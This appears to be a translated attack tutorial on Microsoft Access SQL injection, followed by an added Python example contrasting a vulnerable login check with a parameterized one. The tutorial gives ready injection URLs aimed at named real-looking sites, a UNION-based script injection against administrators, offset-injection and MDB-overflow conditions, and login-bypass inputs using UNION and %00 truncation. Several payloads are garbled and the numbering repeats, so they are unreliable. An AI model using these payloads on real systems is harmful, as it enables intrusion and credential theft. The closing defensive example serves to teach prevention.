1. Access Cross-database query.
http://www.bkjia.com/news/type.asp?Type?Id=1 and 1=2 union select 1,2,user,4,5,6 from [C:\root\data\%23db1.asp].admin
Condition: the sub-site has an injection point. This method can then be used to query against the other site's path.
[C:\root\data\%23db1.asp] is the database.
admin is the table in the database.
user is the field of the admin table in the database.
The NBSI tool can handle this intelligently.
2. Use XSS
For the case where there is only an injection point and the tables are not known.
http://www.51qljr.com/xinxi/shownews.asp?Id=(575) And (1)=(2) UNION%0DSELECT%0D1,chr(116)%2bchr(101)%2bchr(115)%2bchr(116),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17&id=18%0Dfrom%0DMSysAccessObjects
The chr codes spell "test".
MSysAccessObjects is a system table.
Our code is then cross-site scripted to the administrator. Haha ~
3. Access offset Injection
Put simply, the principle of offset injection:
1. A union merge query requires the same columns in the same order;
2. select * from admin as a inner join admin as b on a.id = b.id; in this example, the admin table is aliased as a and b.
The query condition is that the id column of table a equals the id column of table b, and all matching rows are returned. Since a and b are the same table, every row is returned. Check the syntax if this is unclear.
3. * stands for all fields. For example, if you query the admin table and it has several fields, * stands for those several fields.
For example, if admin has five columns and union select 1,2,3,* from admin returns normally, the injected table has eight columns (5 + 3 = 8).
Look at 90sec haxsscker's article: http://www.bkjia.com/Article/201212/179284.html
Example 2: red/Black Alliance
3. Access Overflow
To sum up, the conditions required for the MDB overflow + cross-database shell method:
1. You must have an absolute website path.
2. You must have an upload point in any format. (even if it is not an MDB suffix, cross-database connection is sufficient if the format is correct)
3. Of course, there must be injection points (or you can execute SQL statements in the background)
Some Thoughts on ACCESS Cross-database overflow MDB database overflow (what else is Union query described in cross-database query.)
Microsoft Data Access Component Data Source Name Buffer Overflow Vulnerability
4. Other Ideas
1) ACCESS advanced injection and exploitation skills (execute commands, etc)
2) Access injection and export file (injection and export file, with IIS interpretation vulnerability)
Appendix: lake2: http://www.bkjia.com/Article/201104/87439.html
3) usage of Access from basic to advanced (this article is very general)
4) %00, the Access truncation character (did you know?)
5) An amazing injection:
Username input:
' Union SELECT, 1 FROM admin (table) WHERE ''=' //, 1 indicates the number of fields. Find the count by blind trial....
Password input: 1
Or enter the username:
Union select, 1 AS pwd (password field) FROM admin (table) WHERE ''='
// Set the columns to 1 according to the column count of, for example, the admin table; we set the two unknown columns and the pwd column to 1, so the program's vulnerable code if pwd = rs("pwd") then... becomes 1 = 1, because we control the password input.
Password input: 1
This is a successful bypass!
The ' is closed.
You can also use: ' Union SELECT, 1 FROM admin %00 // truncation
You can also use: union select, 1 AS pwd %00 // truncation does not require a table name. The select forcibly inserts two unnamed columns and uses the as keyword to alias pwd!!!
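The login check from item 5 above, shown next to a parameterized version, as an added example that is not code from the original article. Python with an in-memory SQLite database stands in for the ASP page and the Access file; the table contents, function names and the single-column query are assumptions.

```python
import hmac
import sqlite3

def make_db():
    """Constructed sample data; SQLite stands in for the Access .mdb."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (id INTEGER, username TEXT, pwd TEXT)")
    db.execute("INSERT INTO admin VALUES (1, 'root', 'S3cret-constructed')")
    return db

def login_vulnerable(db, username, password):
    # Pattern the article targets: user input concatenated into the SQL text,
    # then the submitted password compared with whatever row comes back,
    # i.e. the ASP check `if pwd = rs("pwd") then`.
    sql = "SELECT pwd FROM admin WHERE username = '" + username + "'"
    row = db.execute(sql).fetchone()
    # str() mimics VBScript's loose comparison of 1 and "1".
    return row is not None and str(row[0]) == password

def login_fixed(db, username, password):
    # Bound parameter: the username is only ever data, so a UNION inside it
    # cannot add rows to the result set.
    row = db.execute(
        "SELECT pwd FROM admin WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    # Plaintext comparison kept only to mirror the pattern above; a real
    # system would store and verify a salted password hash instead.
    return hmac.compare_digest(str(row[0]).encode(), password.encode())

# Username input in the shape the article gives, with the column list written
# out for this one-column query (constructed for the example).
UNION_USERNAME = "' UNION SELECT 1 AS pwd FROM admin WHERE ''='"

def demo():
    db = make_db()
    return {
        "vulnerable_bypassed": login_vulnerable(db, UNION_USERNAME, "1"),
        "fixed_bypassed": login_fixed(db, UNION_USERNAME, "1"),
        "fixed_real_login": login_fixed(db, "root", "S3cret-constructed"),
        "fixed_wrong_password": login_fixed(db, "root", "1"),
    }

if __name__ == "__main__":
    print(demo())
```

The same binding is available in classic ASP through ADODB.Command parameters, which is where the fix belongs on the kind of site the article describes.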